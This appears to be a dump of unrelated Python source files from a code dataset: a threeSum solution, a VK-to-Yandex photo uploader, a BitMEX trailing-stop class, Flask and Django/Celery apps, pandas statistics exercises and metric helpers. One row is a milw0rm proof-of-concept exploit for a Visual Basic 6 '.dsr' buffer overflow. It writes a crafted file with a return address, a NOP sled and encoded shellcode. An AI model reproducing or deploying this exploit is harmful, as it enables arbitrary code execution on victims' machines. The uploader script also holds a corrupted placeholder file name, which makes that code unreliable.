    def threeSum(self, nums: List[int]) -> List[List[int]]:
        """Return all unique triplets from nums that sum to zero.

        Sort, then for each anchor k use two pointers L/R on the suffix.
        Fixes: the original had the typo ``continuere`` (NameError whenever a
        duplicate anchor appeared, e.g. on [-1, 0, 1, 2, -1, -4]), and it
        appended tuples despite the declared List[List[int]] return type.
        NOTE(review): this snippet assumes ``List`` is provided by the judge
        (``from typing import List``), as is conventional for LeetCode stubs.
        """
        res = []
        nums.sort()
        for k in range(len(nums) - 2):
            # Skip duplicate anchors so each triplet is emitted once.
            if k > 0 and nums[k] == nums[k - 1]:
                continue
            # Sorted input: a positive anchor can never start a zero-sum triplet.
            if nums[k] > 0:
                break
            L, R = k + 1, len(nums) - 1
            while L < R:
                s = nums[k] + nums[L] + nums[R]
                if s < 0:
                    L += 1
                elif s > 0:
                    R -= 1
                else:
                    res.append([nums[k], nums[L], nums[R]])
                    # Hop over duplicates on both sides before moving inward.
                    while L < R and nums[L] == nums[L + 1]:
                        L += 1
                    while L < R and nums[R] == nums[R - 1]:
                        R -= 1
                    L += 1
                    R -= 1
        return res
# @lc code=end
|
9,581 | a22bc3bdb5e35060eff7f523b90d605ff2dd3878 | import requests
import datetime
import time
from tqdm import tqdm
import json
import logging
logging.basicConfig(filename='logo.log', level=logging.DEBUG, filemode='w')
logging.debug('debug message')
logging.info('info message')
# from pprint import pprint
id_vk = input('введите id пользователя вк: ')
token_vk = input('введите токен вк: ')
url = 'https://api.vk.com/method/photos.get'
params = {'user_id': id_vk, 'access_token': token_vk, 'v': '5.131','album_id': 'profile', 'extended': '1', 'photo_sizes': '1'}
res = requests.get(url, params=params)
# pprint(res.json())
token_ya = input('введите токен Yandex: ')
def ya_headers():
    """Build the standard auth headers for the Yandex.Disk REST API."""
    return {
        'Content-type': 'application/json',
        'Authorization': 'OAuth {}'.format(token_ya),
    }
def put_folder(path):
    """Create folder *path* on Yandex.Disk and return the path.

    Prints whether the folder was newly created (201) or already existed (409).
    """
    api_url = 'https://cloud-api.yandex.net/v1/disk/resources/'
    response = requests.put(api_url,
                            headers=ya_headers(),
                            params={'path': path, 'url': api_url})
    status = response.status_code
    if status == 201:
        print('папка создана')
    elif status == 409:
        print('Папка уже существует. Файлы будут помещены в неё.')
    return path
def post_file(file_url, file_name):
    """Ask Yandex.Disk to fetch *file_url* into *file_name*; return the JSON reply."""
    endpoint = 'https://cloud-api.yandex.net/v1/disk/resources/upload'
    payload = {'path': f'/{file_name}', 'url': file_url}
    reply = requests.post(endpoint, headers=ya_headers(), params=payload)
    return reply.json()
# Main loop: for every profile photo, pick the largest size, upload it to
# Yandex.Disk, and record (file_name, size) metadata into foto.json.
folder_name = put_folder(input("введите имя папки для загрузки фотографий: "))
name_list = []
data = []
size_list = []
for photos in tqdm(res.json()['response']['items']):
    sizes = photos['sizes']
    # Collect the size letters; reverse-sorted so size_list[0] is the largest.
    for picture in sizes:
        size_list.append(picture['type'])
    size_list.sort(reverse=True)
    for picture1 in sizes:
        data_dict = {}
        if picture1['type'] == size_list[0]:
            href = picture1['url']
            # Photos are named by like-count; on collision, append the photo date.
            filename = photos['likes']['count']
            if filename in name_list:
                filename = f"{photos['likes']['count']}+{datetime.datetime.fromtimestamp(photos['date']).isoformat().replace(':', '|')}"
                # NOTE(review): "(unknown)" below looks like a corrupted/placeholder
                # destination name — presumably this should embed {filename}; confirm
                # against the original script before relying on it.
                post_file(href, f"{folder_name}/(unknown)")
            else:
                post_file(href, f"{folder_name}/(unknown)")
            data_dict['file_name'] = filename
            data_dict['size'] = picture1['type']
            data.append(data_dict)
            name_list.append(filename)
    size_list.clear()
    time.sleep(1)  # crude rate limiting between uploads
with open ('foto.json', 'w') as f:
    json.dump(data, f, ensure_ascii=False, indent=2)
9,582 | ea4ec2e605ab6e8734f7631fe298c93467908b5f | import json
import decimal
import threading
import websocket
from time import sleep
from supervisor.core.utils.math import to_nearest
def find_item_by_keys(keys, table, match_data):
    """Return the first row of *table* equal to *match_data* on every key in *keys*.

    Returns None when no row matches.
    """
    for row in table:
        if all(row[key] == match_data[key] for key in keys):
            return row
class TrailingShell:
    """Trailing-stop helper that follows BitMEX prices over a websocket.

    Subscribes to the instrument feed for ``order.symbol`` and, while
    ``tracking`` is on, moves ``order`` whenever the observed price extremum
    (max for Sell, min for Buy) improves past ``initial_price``.
    NOTE(review): the callback signatures (``__on_message(self, message)``
    etc.) match the pre-1.x websocket-client API, which did not pass the
    ``ws`` object first — confirm the pinned websocket-client version.
    """
    # Don't grow a table larger than this amount. Helps cap memory usage.
    MAX_TABLE_LEN = 200
    def __init__(self, order, offset: int, tick_size: float, test=True, init_ws=True):
        # offset: trailing distance in percent; tick_size: price rounding unit.
        # test=True targets the BitMEX testnet; init_ws=False skips connecting
        # (useful for unit tests).
        self.tick_size = tick_size
        self.exited = False
        self.test = test
        self.order = order
        self.offset = offset
        self.last_price = 0
        self._min_price = float('inf')
        self._max_price = -1
        self.initial_price = float('nan')
        self.tracking = False
        self.ws = None
        self.__reset()
        if init_ws:
            self.connect()
    def __del__(self):
        self.exit()
    def exit(self):
        """Mark the tracker as finished and close the websocket if open."""
        self.exited = True
        if self.ws is not None:
            self.ws.close()
    def __reset(self):
        # Clear per-connection state (table data, per-table key lists, error flag).
        self.data = {}
        self.keys = {}
        self.exited = False
        self._error = None
    def get_instrument(self, symbol):
        """Return the cached instrument row for *symbol*, or None before the
        first 'instrument' partial arrives. Raises if the feed has instrument
        data but none for this symbol."""
        instruments = self.data.get('instrument', None)
        if instruments is None:
            return None
        matching_instruments = [i for i in instruments if i['symbol'] == symbol]
        if len(matching_instruments) == 0:
            raise Exception("Unable to find instrument or index with symbol: " + symbol)
        instrument = matching_instruments[0]
        # Turn the 'tickSize' into 'tickLog' for use in rounding
        # http://stackoverflow.com/a/6190291/832202
        instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])).as_tuple().exponent * -1
        return instrument
    def calculate_new_price(self, extremum) -> float:
        """Return the trailing price *offset* percent away from *extremum*,
        rounded to the instrument tick size (below for Sell, above for Buy)."""
        if self.order.side == 'Sell':
            needed_price = extremum * (1 - self.offset / 100)
        else:
            needed_price = extremum * (1 + self.offset / 100)
        needed_price = to_nearest(needed_price, tickSize=self.tick_size)
        return needed_price
    @property
    def min_price(self):
        # Lowest price seen since start_trailing() (Buy-side extremum).
        return self._min_price
    @min_price.setter
    def min_price(self, value):
        # Only move the order once the price has dipped below the activation level.
        if value < self.initial_price:
            new_price = self.calculate_new_price(value)
            self.order.move(to=new_price)
        self._min_price = value
    @property
    def max_price(self):
        # Highest price seen since start_trailing() (Sell-side extremum).
        return self._max_price
    @max_price.setter
    def max_price(self, value):
        # Only move the order once the price has risen above the activation level.
        if value > self.initial_price:
            new_price = self.calculate_new_price(value)
            self.order.move(to=new_price)
        self._max_price = value
    def stop_trailing(self):
        """Stop adjusting the order on price updates."""
        self.tracking = False
    def start_trailing(self, initial_price: float):
        """Begin trailing: reset the tracked extrema and arm price tracking.

        :param initial_price: the price after reaching which order will be moving
        """
        self._max_price = -1
        self._min_price = float('inf')
        self.initial_price = initial_price
        self.tracking = True
    def connect(self):
        """Connect to the websocket and initialize data stores."""
        symbol = self.order.symbol
        if self.test:
            host = 'wss://testnet.bitmex.com/realtime'
        else:
            host = 'wss://bitmex.com/realtime'
        # Get WS URL and connect.
        endpoint = f"realtime?subscribe=instrument:{symbol}"
        ws_url = host + endpoint
        self.__connect(ws_url)
        # Connected. Wait for partials
        self.__wait_for_symbol()
    def __connect(self, ws_url):
        # Run the websocket client on a daemon thread and give it ~5 s to connect.
        self.ws = websocket.WebSocketApp(ws_url,
                                         on_message=self.__on_message,
                                         on_close=self.__on_close,
                                         on_open=self.__on_open,
                                         on_error=self.__on_error,
                                         header=[])
        self.wst = threading.Thread(target=lambda: self.ws.run_forever())
        self.wst.daemon = True
        self.wst.start()
        # Wait for connect before continuing
        conn_timeout = 5
        while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout and not self._error:
            sleep(1)
            conn_timeout -= 1
        if not conn_timeout or self._error:
            self.exit()
    def __wait_for_symbol(self):
        # Block until the first 'instrument' partial has populated self.data.
        while not {'instrument'} <= set(self.data):
            sleep(0.1)
    def __on_message(self, message):
        """Handler for parsing WS messages."""
        message = json.loads(message)
        table = message['table'] if 'table' in message else None
        action = message['action'] if 'action' in message else None
        if 'subscribe' in message:
            if not message['success']:
                self.error("Unable to subscribe to %s. Error: \"%s\" Please check and restart." %
                           (message['request']['args'][0], message['error']))
        elif 'status' in message:
            if message['status'] == 400:
                self.error(message['error'])
            if message['status'] == 401:
                self.error("API Key incorrect, please check and restart.")
        elif action:
            if table not in self.data:
                self.data[table] = []
            if table not in self.keys:
                self.keys[table] = []
            # There are four possible actions from the WS:
            # 'partial' - full table image
            # 'insert'  - new row
            # 'update'  - update row
            # 'delete'  - delete row
            if action == 'partial':
                self.data[table] += message['data']
                # Keys are communicated on partials to let you know how to uniquely identify
                # an item. We use it for updates.
                self.keys[table] = message['keys']
            elif action == 'insert':
                self.data[table] += message['data']
                # Limit the max length of the table to avoid excessive memory usage.
                # Don't trim orders because we'll lose valuable state if we do.
                if table not in ['order', 'orderBookL2'] and len(self.data[table]) > TrailingShell.MAX_TABLE_LEN:
                    self.data[table] = self.data[table][(TrailingShell.MAX_TABLE_LEN // 2):]
            elif action == 'update':
                # Locate the item in the collection and update it.
                for updateData in message['data']:
                    item = find_item_by_keys(self.keys[table], self.data[table], updateData)
                    if not item:
                        continue  # No item found to update. Could happen before push
                    # Update this item.
                    item.update(updateData)
                    # Remove canceled / filled orders
                    # if table == 'order' and item['leavesQty'] <= 0:
                    #     self.data[table].remove(item)
            elif action == 'delete':
                # Locate the item in the collection and remove it.
                for deleteData in message['data']:
                    item = find_item_by_keys(self.keys[table], self.data[table], deleteData)
                    self.data[table].remove(item)
            else:
                raise Exception("Unknown action: %s" % action)
        # After any table change, refresh last_price and (if armed) push the
        # tracked extremum through the property setters, which move the order.
        instrument = self.get_instrument(symbol=self.order.symbol)
        if instrument is not None:
            self.last_price = instrument['lastPrice']
            if self.tracking:
                if self.last_price > self.max_price and self.order.side == 'Sell':
                    self.max_price = self.last_price
                elif self.last_price < self.min_price and self.order.side == 'Buy':
                    self.min_price = self.last_price
    def __on_close(self):
        self.exit()
    def __on_open(self):
        pass
    def __on_error(self, error):
        if not self.exited:
            self.error(error)
    def error(self, err):
        # NOTE(review): this discards *err* and never sets self._error, which
        # __connect polls — presumably it was meant to record the error before
        # exiting; confirm intended behavior.
        self.exit()
|
9,583 | c7037b6a576374f211580b304f8447349bbbbea3 | #!/usr/bin/python
# -*- coding: latin-1 -*-
from flask import Flask, render_template
# Minimal Flask portfolio site: one route per page, each rendering a template
# with a page title.
app = Flask(__name__)
@app.route('/')
def index():
    # Home page.
    return render_template('index.html', titre="Ludovic DELSOL - Portfolio")
@app.route('/etude')
def etude():
    # Studies page.
    return render_template('etude.html', titre="Portfolio Ludovic DELSOL - Etude")
@app.route('/experience')
def experience():
    # Work-experience page.
    return render_template('experience.html', titre="Portfolio Ludovic DELSOL - Experiences Pros")
@app.route('/competence')
def compentence():
    # NOTE(review): function and template are spelled "compentence" while the
    # route says "competence" — presumably a typo kept for template/url_for
    # compatibility; renaming would change the Flask endpoint name.
    return render_template('compentence.html', titre="Portfolio Ludovic DELSOL - Compétences")
@app.route('/projet')
def project():
    # Projects page.
    return render_template('projet.html', titre="Portfolio Ludovic DELSOL - Projets")
if __name__ == '__main__':
    app.run(debug=True)
|
9,584 | 7f7d087b7001cd7df01d4f22e056809be5a35568 | # 使用celery
from django.conf import settings
from django.core.mail import send_mail
from django.template import loader,RequestContext
from celery import Celery
import time
# 在任务处理者一
#
# 端加的代码
import os
import django
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "dailyfresh.settings")
django.setup()
from goods.models import GoodsType, IndexGoodsBanner, IndexPromotionBanner, IndexTypeGoodsBanner
# 创建一个实例对象
app = Celery('celery_tasks.tasks', broker='redis://127.0.0.1:6379/8')
# 定义任务函数,发邮件函数
@app.task
def send_register_active_email(to_email, username, token):
    """Celery task: e-mail an account-activation link to a new user.

    The activation URL embeds *token*; the plain-text body is intentionally
    empty and the content is delivered as HTML.
    """
    subject = '天天生鲜欢迎信息'
    html_message = '<h1>%s,欢迎</h1><br>请点击以下链接激活<br><a href="http://127.0.0.1:8000/user/active/%s">http://127.0.0.1:8000/user/active/%s</a>'%(username, token, token)
    send_mail(subject, '', settings.EMAIL_FROM, [to_email], html_message=html_message)
@app.task
def generate_static_index_html():
    """Celery task: render the shop landing page to a static HTML file.

    Loads categories, carousel banners and promotions from the database,
    renders 'static_index.html' and writes the result to
    static/static_index/index.html under BASE_DIR.
    """
    categories = GoodsType.objects.all()
    # Home-page carousel banners, in display order.
    carousel_banners = IndexGoodsBanner.objects.all().order_by('index')
    # Promotion banners, in display order.
    promo_banners = IndexPromotionBanner.objects.all().order_by('index')
    for category in categories:
        # Image-style (display_type=1) and text-style (display_type=0)
        # product banners for this category, attached dynamically so the
        # template can reach them per category.
        category.image_banners = IndexTypeGoodsBanner.objects.filter(
            type=category, display_type=1).order_by('index')
        category.title_banners = IndexTypeGoodsBanner.objects.filter(
            type=category, display_type=0).order_by('index')
    context = {
        'types': categories,
        'goods_banners': carousel_banners,
        'promotion_banners': promo_banners,
    }
    rendered_html = loader.get_template('static_index.html').render(context)
    save_path = os.path.join(settings.BASE_DIR, 'static/static_index/index.html')
    with open(save_path, 'w', encoding='utf-8') as f:
        f.write(rendered_html)
|
9,585 | 40a73ceeeb310c490fe2467511966679a1afa92b | #usage: exploit.py
print "-----------------------------------------------------------------------"
print ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling BoF\n'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " Once you create the file, open it with Visual Basic 6 and click on"
print " command name."
print "-----------------------------------------------------------------------"
buff = "A" * 555
get_EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll
nop = "\x90" * 12
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"
"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
)
dsrfile = (
"VERSION 5.00\n"
"Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n"
" ClientHeight = 6315\n"
" ClientLeft = 0\n"
" ClientTop = 0\n"
" ClientWidth = 7980\n"
" _ExtentX = 14076\n"
" _ExtentY = 11139\n"
" FolderFlags = 1\n"
' TypeLibGuid = "{D7133993-3B5A-4667-B63B-749EF16A1840}"\n'
' TypeInfoGuid = "{050E7898-66AC-4150-A213-47C7725D7E7E}"\n'
" TypeInfoCookie = 0\n"
" Version = 4\n"
" NumConnections = 1\n"
" BeginProperty Connection1\n"
' ConnectionName = "Connection1"\n'
" ConnDispId = 1001\n"
" SourceOfData = 3\n"
' ConnectionSource= ""\n'
" Expanded = -1 'True\n"
" QuoteChar = 96\n"
" SeparatorChar = 46\n"
" EndProperty\n"
" NumRecordsets = 1\n"
" BeginProperty Recordset1\n"
' CommandName = "Command1"\n'
" CommDispId = 1002\n"
" RsDispId = 1003\n"
' CommandText = "' + buff + get_EIP + nop + shellcode + nop + '"\n'
' ActiveConnectionName= "Connection1"\n'
" CommandType = 2\n"
" dbObjectType = 1\n"
" Locktype = 3\n"
" IsRSReturning = -1 'True\n"
" NumFields = 1\n"
" BeginProperty Field1\n"
" Precision = 10\n"
" Size = 4\n"
" Scale = 0\n"
" Type = 3\n"
' Name = "ID"\n'
' Caption = "ID"\n'
" EndProperty\n"
" NumGroups = 0\n"
" ParamCount = 0\n"
" RelationCount = 0\n"
" AggregateCount = 0\n"
" EndProperty\n"
"End\n"
'Attribute VB_Name = "DataEnvironment1"\n'
"Attribute VB_GlobalNameSpace = False\n"
"Attribute VB_Creatable = True\n"
"Attribute VB_PredeclaredId = True\n"
"Attribute VB_Exposed = False\n"
)
try:
out_file = open("DataEnvironment1.dsr",'w')
out_file.write(dsrfile)
out_file.close()
print "\nFILE CREATION COMPLETED!\n"
except:
print " \n -------------------------------------"
print " Usage: exploit.py"
print " -------------------------------------"
print "\nAN ERROR OCCURS DURING FILE CREATION!"
# milw0rm.com [2008-04-04]
|
9,586 | f5542cfe6827c352cc6e6da1147e727f2b2d8247 | import pandas as pd
import numpy
dato=pd.read_csv('medallero_Panamericanos_Lima2019.csv')
print(dato)
def calculo_suma():
    """Print the sum of the 'Bronce' column via several equivalent routes."""
    bronce = dato['Bronce']
    print("---Funcion con Python---")
    print("la sumatoria de los valores: ", bronce.sum())
    print("---Funcion con Numpy---")
    print("la sumatoria de los valores: ", numpy.sum(bronce))
    print("---Otras Formas---")
    print(bronce.sum())
    print(numpy.sum(bronce))
def calculo_conteo():
    """Print the element count of the 'Bronce' column via len, pandas and numpy."""
    print("---Funcion de Python---")
    print("Los número de elementos son :",len(dato['Bronce']))
    print(len(dato.Bronce))
    print("---Funcion de Pandas---")
    # NOTE: pandas .count() excludes NaN, while len()/numpy.size include them,
    # so the three figures can differ on columns with missing values.
    print("Los número de elementos son :",dato['Bronce'].count())
    print(dato.Bronce.count())
    print("---Funcion de Numpy---")
    print("Los número de elementos son :",numpy.size(dato['Bronce']))
    print(numpy.size(dato.Bronce))
def calculo_media():
    """Print the mean of the 'Bronce' column via three equivalent routes."""
    bronce = dato.Bronce
    print("---Funcion de Python---")
    print("La media es: ", bronce.sum() / bronce.count())
    print("---Funcion de Pandas---")
    print("La media es: ", bronce.mean())
    print("---Funcion de Numpy---")
    print("La media es: ", numpy.mean(bronce))
def calculo_media2(redondeo=2):
    """Return the mean of 'Bronce' rounded to *redondeo* decimal places."""
    # The banner text says "Mediana" but the value printed/returned is the mean,
    # matching the original behavior.
    print("---Mediana con 2 decimales---")
    return round(dato.Bronce.mean(), redondeo)
def calculo_moda():
    """Return the mode(s) of the 'Bronce' column as a pandas Series."""
    return dato.Bronce.mode()
def calculo_mediana():
    """Return the median of the 'Bronce' column.

    Fix: the original indexed the middle position of the *unsorted* column,
    which is not the median; sort first. For an even count the two middle
    values are averaged (standard definition).
    """
    valores = dato.Bronce.sort_values().reset_index(drop=True)
    nro_item = numpy.size(valores)
    pos_mediana = round(nro_item / 2)
    print('Posicion mediana: ', pos_mediana)
    if nro_item % 2 == 1:
        return valores[nro_item // 2]
    return (valores[pos_mediana - 1] + valores[pos_mediana]) / 2
def calculo_percentiles():
    """Print the 20th, 50th and 75th percentiles of the 'Bronce' column."""
    cortes = [20, 50, 75]
    print('Percentiles', numpy.percentile(dato['Bronce'], cortes))
def grafico_percentil():
    """Show a box plot of the 'Bronce' column (visualizes quartiles/outliers)."""
    # Imported locally so the plotting stack is only required when plotting.
    import matplotlib.pylab as plt
    import seaborn as sb
    sb.boxplot(y="Bronce", data=dato)
    plt.show()
def calculo_varianza():
    """Print the population variance (ddof=0) of the data."""
    # NOTE(review): numpy.var is applied to the whole DataFrame, not just
    # dato['Bronce'] as in the sibling functions — presumably 'Bronce' was
    # intended, and non-numeric columns may make this fail; confirm.
    vari=numpy.var(dato)
    print("La varianza es:" ,vari)
calculo_varianza()
|
9,587 | eea962d6c519bee802c346fcf8d0c7410e00c30b | h = int(input())
# Classic climbing puzzle: with height h (read above), daily climb a and
# nightly slide b, print the number of days needed to reach the top.
# ceil((h - b) / (a - b)) computed with integer arithmetic; assumes a > b.
a = int(input())
b = int(input())
c = (h - b + a - b - 1) // (a - b)
print(int(c))
|
9,588 | 11ca13aca699b1e0744243645b3dbcbb0dacdb7e | import random as rnd
import pandas as pd
from sklearn.metrics import accuracy_score
from sklearn.metrics import f1_score
from sklearn.metrics import roc_auc_score
from sklearn.metrics import confusion_matrix
from sklearn.metrics import precision_recall_fscore_support, roc_auc_score
import os
def mkdir_tree(source):
    """Create the nested output-directory tree for classifier artifacts.

    Layout: ../data/clf_meta/<source>/<subdir>/<dataset>[/<dataset2>[/<dataset3>]]
    where subdirs depend on *source* ('RDEL' gets extra feature/vectorizer dirs)
    and the deeper levels only exist for 'increment' and 'valarch' datasets.
    Directories that already exist are left untouched.

    :param source: classifier/source name; None falls back to 'default'.
    """
    if source is None:
        source = 'default'
    base_dirs = ['../data/clf_meta/%s/'%source]
    # hostname = socket.gethostname()
    # print('hostname is', hostname)
    # if 'arc-ts.umich.edu' in hostname:
    #     base_dirs.append('/scratch/cbudak_root/cbudak/lbozarth/fakenews/data/clf_meta/%s'%source)
    print('base_dirsssssss', base_dirs)
    for base_dir in base_dirs:
        # NOTE(review): os.mkdir (not makedirs) — fails if ../data/clf_meta
        # does not already exist; presumably that parent is created elsewhere.
        if not os.path.exists(base_dir):
            print('mkdir', base_dir)
            os.mkdir(base_dir)
        if source == 'RDEL':
            subdirs = ['models', 'preds', 'features', 'vectorizers']
        else:
            subdirs = ['models', 'preds']
        datasets = ['default', 'events', 'increment', 'nela', 'fakenewscorpus', 'forecast', 'events_v2', 'valarch']
        datasets2 = ['default', 'nela', 'fakenewscorpus']
        datasets3 = ['bydomains', 'byforecast', 'basic']
        for d in subdirs:
            sub_dir = os.path.join(base_dir, d)
            if not os.path.exists(sub_dir):
                print('mkdir', sub_dir)
                os.mkdir(sub_dir)
            for dataset in datasets:
                dataset_path = os.path.join(sub_dir, dataset)
                if not os.path.exists(dataset_path):
                    print('mkdir', dataset_path)
                    os.mkdir(dataset_path)
                # Only these two dataset kinds get the second level of nesting.
                if dataset == 'increment' or dataset=='valarch':
                    for ds2 in datasets2:
                        ds2_path = os.path.join(dataset_path, ds2)
                        if not os.path.exists(ds2_path):
                            print('mkdir', ds2_path)
                            os.mkdir(ds2_path)
                        # And only 'valarch' gets the third level.
                        if dataset=='valarch':
                            for ds3 in datasets3:
                                ds3_path = os.path.join(ds2_path, ds3)
                                if not os.path.exists(ds3_path):
                                    print('mkdir', ds3_path)
                                    os.mkdir(ds3_path)
    print('finished making directory tree')
    return
def gen_rand_dates(dataset="default", start_date='2016-06-15', end_date='2016-12-30', n=10):
rand_dates = []
for i in range(n):
dt = pd.to_datetime(rnd.choice(pd.bdate_range(start_date, end_date)))
rand_dates.append(dt)
print(sorted(rand_dates))
return rand_dates
def evaluate_clf_preformance(y_true, y_pred, y_pred_prob):
    """Compute a dict of binary-classification metrics (fake = positive class 1).

    :param y_true: ground-truth labels.
    :param y_pred: hard predictions.
    :param y_pred_prob: positive-class scores used for ROC-AUC.
    :return: dict with AUC, accuracy, micro/macro/weighted F1, per-class F1
             (fake/real) and the confusion-matrix cells.
    """
    tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()
    auc = roc_auc_score(y_true, y_pred_prob)
    accu = accuracy_score(y_true, y_pred)
    # NOTE(review): pos_label is ignored by sklearn when average is
    # 'macro'/'micro'/'weighted'; harmless here but it triggers warnings.
    f1_macro = f1_score(y_true, y_pred, average='macro', pos_label=1)
    f1_micro = f1_score(y_true, y_pred, average='micro', pos_label=1)
    f1_weighted = f1_score(y_true, y_pred, average='weighted', pos_label=1)
    f1_pos = f1_score(y_true, y_pred, pos_label=1)
    f1s = f1_score(y_true, y_pred, average=None)
    # Recover the negative-class F1 as "the per-class score that isn't f1_pos".
    # NOTE(review): if both classes happen to have identical F1, f1_real
    # stays None — confirm downstream tolerates that.
    f1_real = None
    for f in f1s:
        if f!=f1_pos:
            f1_real = f
    print('auc, accuracy, f1_micro, f1_macro, f1_weighted, f1_fake, f1_real are', auc, accu, f1_micro, f1_macro, f1_weighted, f1_pos, f1_real)
    return {'auc_score':auc, 'accuracy_score':accu, 'f1_micro':f1_micro, 'f1_macro':f1_macro, 'f1_weighted':f1_weighted,
            'f1_fake':f1_pos, 'f1_real':f1_real, 'tn':tn, 'fp':fp, 'fn':fn, 'tp':tp}
import numpy as np
def gen_precision_recall(y_true, y_pred):
    """Return (precision, recall) for the positive ('fake') class.

    Returns (nan, nan) when only one class is present in the inputs.
    """
    percision, recall, f1s, _ = precision_recall_fscore_support(y_true, y_pred, average=None, pos_label=1)
    if len(f1s) == 1:
        return np.nan, np.nan  # [1][1]; too few values
    return percision[1], recall[1] #for fake only
def gen_fnr_fpr(y_true, y_pred):
    """Return (TNR, TPR, accuracy) from the binary confusion matrix.

    NOTE(review): despite the name, the values returned are specificity
    tn/(fp+tn), sensitivity tp/(fn+tp) and accuracy — NOT the false-negative
    and false-positive rates; confirm callers expect this.
    Returns (nan, nan, nan) if the confusion matrix cannot be unpacked
    (e.g. only one class present) or a denominator is zero.
    """
    try:
        tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()
        # # Sensitivity, hit rate, recall, or true positive rate
        # TPR = TP / (TP + FN)
        # # Specificity or true negative rate
        # TNR = TN / (TN + FP)
        # # Precision or positive predictive value
        # PPV = TP / (TP + FP)
        # # Negative predictive value
        # NPV = TN / (TN + FN)
        # # Fall out or false positive rate
        # FPR = FP / (FP + TN)
        # # False negative rate
        # FNR = FN / (TP + FN)
        # # False discovery rate
        # FDR = FP / (TP + FP)
        return 1.0 * tn / (fp + tn), 1.0 * tp / (fn + tp), 1.0 * (tp + tn) / (tp + fp + fn + tn)
    except Exception as e:
        return np.nan, np.nan, np.nan  # [1][1]; too few values
9,589 | 8a3cf65550893367b9001369111fa19a3e998d82 | import oneflow as flow
import torch
def convert_torch_to_flow(model, torch_weight_path, save_path):
    """Convert a PyTorch checkpoint into OneFlow weights.

    Loads the state dict at *torch_weight_path*, drops BatchNorm bookkeeping
    tensors ('num_batches_tracked'), moves the rest to CPU numpy arrays,
    loads them into *model* and saves the result with flow.save.
    """
    torch_state = torch.load(torch_weight_path)
    flow_state = {
        key: tensor.detach().cpu().numpy()
        for key, tensor in torch_state.items()
        if "num_batches_tracked" not in key
    }
    model.load_state_dict(flow_state)
    flow.save(model.state_dict(), save_path)
|
9,590 | c41388043295280f9354e661a8d38ae46cae2d65 | #for declaring the variables used in program
# Input image geometry: 200x200, single (grayscale) channel.
img_rows=200
img_cols=200
img_channels=1
# Number of output classes for the classifier.
nb_classes=3
# Number of images used at prediction/test time.
nb_test_images=1
|
9,591 | 1d817ee09705301b574c421a9ff716748c146fdd | import pandas as pd
import re
import sqlite3 as lite
import os
from pybedtools import BedTool
import django
from checkprimers import CheckPrimers
from pandas import ExcelWriter
import datetime
os.environ['DJANGO_SETTINGS_MODULE'] = 'mysite.settings'
django.setup()
class GetPrimers(object):
"""Extracts data from excel spread sheet and imports it into a sqlite database.
:param excel_file: excel file to be imported.
:param db: database the excel file should be imported into.
"""
    def __init__(self, excel_file, db):
        """Store paths and open the SQLite connection.

        NOTE(review): the connection and cursor are published as module
        globals (con/curs) that the other methods rely on — creating a second
        GetPrimers silently rebinds them for every instance.
        """
        self.excel_file = excel_file
        self.db = db
        global con, curs
        con = lite.connect(self.db)  # Creates a database if it doesn't already exist.
        curs = con.cursor()
def get_sheet_name(self):
"""Returns the sheetname to be used to import data from."""
xl = pd.ExcelFile(self.excel_file)
sheet_names = xl.sheet_names
for item in sheet_names:
if re.match('(.*)Current primers', item, re.IGNORECASE): # Only extracts most recent primers.
sheet_name = item
return sheet_name
    def get_primers(self, sheetname):
        """Extracts primer data from sheet.

        Function reads an excel sheet using pandas and stores this in the df_primers_dups data frame (contains
        duplicated rows). The df_primers data frame will go on to be used in the virtual PCR so irrelevant columns
        are dropped and any duplicate rows are removed.
        NOTE(review): ``parse_cols`` and ``sheetname`` are legacy pandas
